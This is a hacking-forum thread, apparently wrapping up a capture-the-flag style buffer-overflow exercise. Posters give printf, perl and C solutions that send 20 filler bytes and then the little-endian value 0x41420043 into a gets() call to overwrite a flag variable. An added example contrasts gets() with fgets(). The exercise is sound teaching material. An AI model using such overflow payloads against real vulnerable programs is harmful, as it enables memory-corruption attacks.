
Thread: BuYS - Understanding functions!!!

  1. #11
    Super liked. Solved.
    P.S.: if you find gdb dull, you can always try DDD. It's a fancy GUI around gdb, and much more fun.
    For Ubuntu fellas: "sudo apt-get install ddd"
    Last edited by Aodrulez; 03-29-2011 at 01:29 AM.
    All it takes, is persistence.


  2. #12
    But the truth is, technically there can be multiple solutions to this one, although the most basic one is going to be the most reliable one.
    All it takes, is persistence.


  3. #13
    Garage Member | Join Date: Sep 2010 | Location: Chennai | Posts: 83 | Blog Entries: 1
    Quote Originally Posted by Aodrulez View Post
    Super liked. Solved.
    P.S.: if you find gdb dull, you can always try DDD. It's a fancy GUI around gdb, and much more fun.
    For Ubuntu fellas: "sudo apt-get install ddd"
    Thanks and congrats for solving..

    @abhay: gets() is different from strcpy().. finding out the difference is the way to solve this.

  4. #14
    abhaythehero (Super Commando Dhruv) | Join Date: Sep 2010 | Location: Lucknow/Pune, India | Posts: 466 | Blog Entries: 2
    Yo, got it this time!! PM sent!

    Also, thanks to Aodrulez and you for giving hints.
    In the world of 0s and 1s, are you a zero or The One !

  5. #15
    fb1h2s (Security Researcher) | Join Date: Jul 2010 | Location: India | Posts: 616 | Blog Entries: 32
    Andro, DDD, that's new; I will give it a try. I find gdb very hard to use.
    Hacking Is a Matter of Time Knowledge and Patience

  6. #16
    Garage Member | Join Date: Sep 2010 | Location: Chennai | Posts: 83 | Blog Entries: 1
    Hey, this is the end of this thread.. hope you all had a great time solving this... Btw, I received correct solutions from b0nd, silentph33r and abhay.. Congrats guys.

    OK, the solution is as follows...

    Ideally it will take 24 bytes to overflow the flag variable.
    Now the thing that may confuse you is the \x00 byte, which is the string terminator.. But gets() doesn't consider \x00 as the string terminator; it considers \n (\x0a) as the string terminator.. So all you need to give is 20 bytes of junk + 0x41420043 in little-endian format.

    Like this...
    Assume the program object file is named test...

    Then,
    $ printf "%020x\x43\x00\x42\x41" | ./test
    you win
    $
    Hope you enjoyed this...
    For the next one, go to http://www.garage4hackers.com/showth...ted=1#post3359
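The two points the thread turns on (the hint in #13 that gets() and strcpy() stop on different bytes, and the explanation in #16 that gets() treats an embedded \x00 as ordinary data and only stops at \n) are shown side by side below as an added C example; it is not the challenge source and not any poster's code. The layout `struct frame` is an assumed stand-in for the challenge's locals (a 20-byte buffer followed by the flag word), `SAMPLE_LINE` is the constructed 24-byte input from the solution plus its newline, and the flag result assumes a little-endian host. The bounded reader mirrors what `fgets(buf, sizeof buf, stdin)` would do in place of `gets()`, which is the fix (gets() itself was removed from the C standard in C11).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 20

/* Hypothetical stand-in for the challenge's locals (the real source lives on
 * the thread's first page and is not reproduced here): a 20-byte buffer directly
 * followed by the 32-bit flag. A struct is used so that writing past buf stays
 * inside one object and the demonstration is defined behaviour; a real stack
 * frame's layout is up to the compiler. */
struct frame {
    unsigned char buf[BUF_SIZE];
    uint32_t flag;
};

/* Constructed input: the 24-byte line the solution sends, followed by the
 * newline that ends a line on stdin (20 filler bytes, then 43 00 42 41, '\n'). */
static const unsigned char SAMPLE_LINE[] =
    "AAAAAAAAAA" "AAAAAAAAAA" "\x43\x00\x42\x41" "\n";
#define SAMPLE_LEN (sizeof SAMPLE_LINE - 1)   /* 25: excludes the literal's own NUL */

/* strcpy()-style length: stops at the first NUL byte. */
size_t len_until_nul(const unsigned char *s, size_t n) {
    size_t i = 0;
    while (i < n && s[i] != '\0') i++;
    return i;
}

/* gets()-style length: an embedded NUL is ordinary data; only '\n' ends the line. */
size_t len_until_newline(const unsigned char *s, size_t n) {
    size_t i = 0;
    while (i < n && s[i] != '\n') i++;
    return i;
}

/* Interpret four bytes as a little-endian 32-bit integer, as an x86 load does. */
uint32_t decode_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Unbounded read with gets() semantics: every byte up to the newline is stored
 * starting at buf, so bytes 20..23 land in flag. The copy is capped at
 * sizeof(struct frame) only so this demonstration cannot write outside the
 * struct; gets() itself has no such cap. Returns the resulting flag value. */
uint32_t flag_after_unbounded_read(const unsigned char *line, size_t n) {
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t len = len_until_newline(line, n);
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, line, len);
    return f.flag;
}

/* Bounded read with fgets(buf, sizeof buf, stdin) semantics: at most
 * BUF_SIZE - 1 bytes are stored and the buffer is NUL-terminated, so the same
 * input can never reach flag. Returns the resulting flag value (unchanged). */
uint32_t flag_after_bounded_read(const unsigned char *line, size_t n) {
    struct frame f;
    memset(&f, 0, sizeof f);
    size_t len = len_until_newline(line, n);
    if (len > BUF_SIZE - 1) len = BUF_SIZE - 1;
    memcpy(f.buf, line, len);
    f.buf[len] = '\0';
    return f.flag;
}
```

On the constructed line, `len_until_nul` returns 21 (it stops at the \x00 inside the flag bytes) while `len_until_newline` returns 24, which is why a NUL-terminated copy would never deliver the full flag word but gets() does; `decode_le32` over bytes 20..23 gives 0x41420043, the value `flag_after_unbounded_read` reports, whereas `flag_after_bounded_read` leaves the flag at 0.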

  7. #17
    b0nd (... I am no Expert, b0nd.g4h@gmail.com) | Join Date: Jul 2010 | Location: irc.freenode.net #g4h | Posts: 744

    The Rule says... "3. You have to post all the replies (either correct or incorrect) of other members which you received via Private Message (PM)."
    http://www.garage4hackers.com/showth...Before-Posting
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  8. #18
    My sweet 'n' simple solution:
    perl -e 'print "AAAAAAAAAAAAAAAAAAAAC\x00BA"' | ./garage
    (btw, I compiled the code as "garage")
    All it takes, is persistence.


  9. #19
    Garage Member | Join Date: Sep 2010 | Location: Chennai | Posts: 83 | Blog Entries: 1
    Quote Originally Posted by b0nd View Post
    The Rule says... "3. You have to post all the replies (either correct or incorrect) of other members which you received via Private Message (PM)."
    http://www.garage4hackers.com/showth...Before-Posting
    My bad!!!

    1st answer from silentph33r was an image, so not including it!!! Because the answer is the same as b0nd's.

    2nd answer from b0nd:

    Finally the following code would do the job:
    # perl -e 'print "A"x20 . "\x43\x00\x42\x41"' | ./test
    And the last from abhay:

    Here is the program that prints "you win" >>

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(void)
    {
        int x;

        /* Fill the initial 20-byte buffer; the byte value does not matter. */
        for (x = 1; x <= 20; x++)
            printf("%c", 'A');

        /* Then the flag value 0x41420043 in little-endian byte order. */
        printf("%c", 'C');      /* 0x43 */
        printf("%c", '\x00');   /* 0x00 */
        printf("%c", 'B');      /* 0x42 */
        printf("%c", 'A');      /* 0x41 */

        /* After compiling this program, pipe its output to the binary compiled
           from the code given in the question. */

        return 0;
    }
